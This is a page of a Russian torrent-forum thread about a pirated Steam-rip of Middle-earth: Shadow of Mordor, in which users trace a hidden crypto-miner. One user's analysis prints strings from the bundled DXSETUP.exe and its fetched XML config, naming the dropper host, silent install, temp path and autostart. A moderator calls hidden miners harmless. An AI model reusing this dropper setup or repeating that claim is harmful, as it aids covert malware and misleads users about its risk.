Middle-Earth: Shadow of Mordor / Средиземье: Тени Мордора [Steam-Rip] [RUS / ENG / MULTI7] (2014) (1.0.1951.29 + 30 DLC)

Страницы :   Пред.  1, 2
Тема закрыта  Игры » Игры для Windows » Архив (Игры)
 

maiklm

Стаж: 18 лет

Сообщений: 5

maiklm · 18-Окт-17 22:58 (7 лет 4 месяца назад, ред. 18-Окт-17 22:58)

T_ONG_BAK_J писал(а):
74044418maiklm
Должен появится левый процесс или маскироваться под другой, удаляя системный в диспетчере задач. Еще майнер может прописаться в в папке темп в аппдате. Посмотрите там. Мне самому интересно, ибо автор стим-рипа в этом замечен не был.
Насколько я успел разобраться в теме, данные процессы нужно как раз искать через диспетчер задач, но раз при его запуске нагрузка на карту резко падает на 0 - то, процесс скорее всего отключается. Есть ли программы способные проверять запущенные процессы - НЕ используя функции диспетчера? И к автору никаких претензий точно предъявлять не буду. Я эту гадость уже 2 недели выловить всякими способами пытаюсь - и ноль полный.
В идеале нужен какой-нить фоновый Логгер, который тупо запротоколирует, какие процессы в какое время использовали GPU и на какой нагрузке.
[Профиль]  [ЛС] 

T_ONG_BAK_J

VIP (Заслуженный)

Стаж: 15 лет 4 месяца

Сообщений: 10783

T_ONG_BAK_J · 18-Окт-17 23:01 (спустя 2 мин.)

maiklm
Попробуйте просканировать малварью, авз, доктором вебом. Они должны найти.
[Профиль]  [ЛС] 

maiklm

Стаж: 18 лет

Сообщений: 5

maiklm · 18-Окт-17 23:04 (спустя 3 мин.)

T_ONG_BAK_J писал(а):
74044487maiklm
Попробуйте просканировать малварью, авз, доктором вебом. Они должны найти.
АВЗ, ВЕБ, КАС - пробовал. Малварью искать малварь - туго представляю себе как
[Профиль]  [ЛС] 

Goldsolid

Стаж: 15 лет 1 месяц

Сообщений: 10

Goldsolid · 19-Окт-17 10:46 (спустя 11 часов)

Не устанавливается, пишет ошибка в данных, код возврата 6, сделал проверку хеша и действительно даже в торренте пишет ошибка в данных CRC. Обидно всю ночь качалось и всё за зря.
[Профиль]  [ЛС] 

Rugodiv

Стаж: 9 лет 10 месяцев

Сообщений: 605

Rugodiv · 19-Окт-17 13:27 (спустя 2 часа 40 мин.)

maiklm
Цитата:
В идеале нужен какой-нить фоновый Логгер, который тупо запротоколирует, какие процессы в какое время использовали GPU и на какой нагрузке.
Process Hacker, в той теме имеется сборка и на русском языке.
[Профиль]  [ЛС] 

Horus1

Стаж: 16 лет 1 месяц

Сообщений: 26

Horus1 · 19-Окт-17 15:11 (спустя 1 час 44 мин.)

Недавно прошёл игру на этом репаке. Загрузку GPU, CPU постоянно мониторю - ничего необычного не замечено.
[Профиль]  [ЛС] 

feskouoplech

Стаж: 8 лет 9 месяцев

Сообщений: 1

feskouoplech · 20-Окт-17 00:21 (спустя 9 часов)

Спасибо за майнер, братик :***
[Профиль]  [ЛС] 

T_ONG_BAK_J

VIP (Заслуженный)

Стаж: 15 лет 4 месяца

Сообщений: 10783

T_ONG_BAK_J · 20-Окт-17 21:04 (спустя 20 часов)

feskouoplech
Скриншот приложите.
[Профиль]  [ЛС] 

Ученик_77

VIP (Заслуженный)

Стаж: 13 лет 3 месяца

Сообщений: 5273

Ученик_77 · 21-Окт-17 15:33 (спустя 18 часов)

feskouoplech
Для общего развития.
Майнеры, как вы их называете, в общем и целом не есть вирусы.
И на серьёзном железе работают почти незаметно и безвредно для пользователя, это во-первых.
Во-вторых, следующий, кто заявит о каком-либо вредоносном ПО в этой раздаче без предоставления какого-либо скриншота, будет немножко наказан.
https://rutr.life/forum/viewtopic.php?t=488848#11
Цитата:
Заявления качающих (скачавших) пользователей о наличии в раздаче вируса (трояна) должны быть обязательно подтверждены скриншотами и сопровождаться информацией о версии антивируса и названии обнаруженного вируса. Заявления без предоставления скриншотов не будут приниматься во внимание, а повторные и излишне эмоциональные - наказываться ПРЕДУПРЕЖДЕНИЕМ.
[Профиль]  [ЛС] 

Anxwi

Стаж: 10 лет 9 месяцев

Сообщений: 21

Anxwi · 26-Окт-17 12:27 (спустя 4 дня)

Ребят, а на пиратке система кузницы немезис работает? Т.е. я могу перенести орка-врага и орка-союзника во 2-ю часть?
[Профиль]  [ЛС] 

VIPsMiha

Стаж: 16 лет 7 месяцев

Сообщений: 5

VIPsMiha · 14-Ноя-17 01:02 (спустя 18 дней, ред. 14-Ноя-17 01:02)

Скачал этот торрент 11/07/2017
Под спойлером немного деталей:
скрытый текст

После установки / запуска игры создалась директория
c:\Users\freen\AppData\Roaming\Java\x86-64bits Windows\Config-DefaultMain\SysUtils SDK v2.49\
с файлом svhcost.exe
Дата установки игры совпадает с датой создания этого файла с директории
О вирусе можно почитать тут
https://virusinfo.info/showthread.php?t=214714

Как только в диспетчере задач отключил автозагрузку этого файла - он удалился с диска
Но остался след в Autoruns for Windows (первая желтая строка)
maiklm писал(а):
74044370
T_ONG_BAK_J писал(а):
73999561maiklm
rom22207
Скриншоты прикрепляйте, когда делаете такие заявления. В любом случае отписал где надо. Модераторы проверят.
Скриншоты - конкретно здорово, но реально незнаю как их селать, подать и преподнести:
Ситуация следующая - после установки игры (на win 8.1 x64), с одним из вложенных кряков, отказом от директа и приблуд - вышло следующее - игра при запуске выдаёт ошибку (какую не помню - и проверить уже не смогу - удалил сразу как заподозрил проблемы), видеокарта NVIDIA GeForce GTX 1060 6GB - начала после включения компьютера запускать кулер (у неё продвинутая маза, что нет нагрузки - кулер не работает, и раньше он не запускался), я заинтересовался. Скачал GPU-Z, свежие антивиры и начал тестить. Ситуация следующая, Антивиры - ничего не нашли, НО при запуске компьютера GPU-Z выдает в Sensors - параметр GPU Load 100%. Как только открываешь диспетчер задач (что через ctrl+alt+dlt, что через пуск) - GPU Load резко падает до оптимальных 1-5%.
При всём вышесказанном - Я ЗНАЮ, что никакой другой программы в период появления столь странного глюка я не устанавливал, но вы вполне обоснованно можете заявить, что я сам виноват и к раздаче это не имеет никакого отношения.
Отсюда вопрос - КАкие скрины ЧЕГО нужно выложить?
(Винду пока не переустановил, если чтото в логах могло сохраниться - подскажите откуда вытащить)
Точно такая же проблема, GPU тоже GTX 1060 6 GB. Сначала думал просто бага винды, NZXT шный мониторинг тоже показывал 100% загрузку GPU после старта компа. Как только запускаешь диспетчер задач - сразу ноль
Антивирус Windows Defender
Antimalware Client Version: 4.12.16299.15
Engine Version: 1.1.14306.0
Antivirus Version: 1.257.436.0
Antispyware Version: 1.257.436.0
Network Realtime Inspection Engine Version: 2.1.14202.0
Network Realtime Inspection Signature Version : 118.1.0.0
UPDATE
Майнер лежит в файле DXSETUP.exe
После запуска создается файл
c:\Users\freen\AppData\Roaming\Java\x86-64bits Windows\Config-DefaultMain\SysUtils SDK v2.49\svhcost.exe и добавляется в автозагрузку.
Запустил ручками файл - вот такая красота.
Отрепортил файл вот сюда надеюсь добавят в сигнатуры свежие https://www.microsoft.com/en-us/wdsi/filesubmission
Картинка под спойлером:
скрытый текст
UPDATE2
Проанализировал файл DXSETUP.exe
Внутри можно увидеть такую шляпу:
M a i n F o r m F o r m 1 Ih t t p : / / b e s t . b u h s . b i z / d o w n / C o n f i g . x m l EH t t p I n s t a l l e r . P r o p e r t i e s . R e s o u r c e s § Гa0¦HІ@xS@Х Q ЂС ЂйY ЂйЂс Ђй Ђэ Ѓ<8 ЂйЂЎ Ђй Ѓ Ѓ%Ѓ)ЂйЂй
]ae8 ] Ѓ% ae8 Ђµ Ђ…Ђ‰ Ѓ5 Ѓ9 Ѓ= Ђ…
ЃIЃMЃQЂ‘Ђ•Ђ‰ Ђ‰ Ђ‰ Ђ• Ѓe Ѓi Ѓq Ѓu Ѓ} ЃЃ Ѓ- Ѓ… Ѓ‰ ЃЌЂЎ ЂЎ Ђ± ЃIЂ‰
ЂµЂ‘Ђ‘ЂµЂµ Ђ‘ Ђµ u Ѓ™ Ѓќ ЃќЂ‰ i ЂЙЂЙ ЃЎ ЃЎЂН( ЃҐЃҐ·z\V4а‰°?_Х
:Ђ $ Ђ ” $ RSA1 §Qљ$ј’VЌќCЧa¶е=єKпє+:Dw<ЖbЖµЛ’ЌPzО:А4*нКh_R3н”iС2™]и€5—БX”gелСuечWчйіЋt™$ЊЎбfОGшЊи/IчHћV\йЧ•–ЁО–$›4,кT,ZDвп¤МЅ0cS Hh t t p : / / b e s t . b u h s . b i z / d o w n / C o n f i g . x m l
И вот такую (файл делал чувак с ником One)
C:\Users\One\Desktop\ins\HttpInstaller\obj\Debug\dxwebsetup.pdb
Если перейти по этой ссылке видим xml конфиг
<config>
<mode>Silent</mode>
<projectname>TestProject</projectname>
<linktofile>http://best.buhs.biz/down/game.zip</linktofile>;
<enablechangepath>False</enablechangepath>
<outputfolder>C:\Users\Default\AppData\Local\Temp</outputfolder>
<exefilename>1.exe</exefilename>
<enablechangecreateshortcat>False</enablechangecreateshortcat>
<createshortcat>False</createshortcat>
<shortcutname>1</shortcutname>
<autostart>True</autostart>
<autostartname>directxwebsetup.exe</autostartname>
</config>
Написал хостеру этого сайта надеюсь долго этот хост не проживет
[Профиль]  [ЛС] 

jaundiced

VIP (Адм)

Стаж: 14 лет 7 месяцев

Сообщений: 15672

jaundiced · 14-Ноя-17 01:05 (спустя 3 мин., ред. 14-Ноя-17 18:32)

VIPsMiha
Спасибо за подробный анализ.
 53.3 GB  ·   magnet6D414EAFBB40B4D2685A67933E171E16D8BAF9D6
./Middle-earth.Shadow.of.Mordor.2014.SteamRip.LP 53.30 GB
Soft 18.65 MB
DirectX 292.5 KB
DXSETUP.exe 292.5 KB 299520
Redist 18.37 MB
installscript.vdf 919 B 919
vcredist_x64.exe 9.79 MB 10274136
vcredist_x86.exe 8.57 MB 8990552
crack.bin 10.64 MB 11164324
data-1.bin 10.95 GB 11765649246
data-2.bin 10.96 GB 11774870370
data-3.bin 10.93 GB 11739878801
data-4.bin 10.91 GB 11724238792
data-5.bin 9.48 GB 10181301458
data-steam.bin 9.20 MB 9656196
Setup.exe 5.40 MB 5662814
[Профиль]  [ЛС] 

Страница 2 из 2

Страницы :   Пред.  1, 2
 
Тема закрыта Главная » Игры » Игры для Windows » Архив (Игры)
Loading...
Error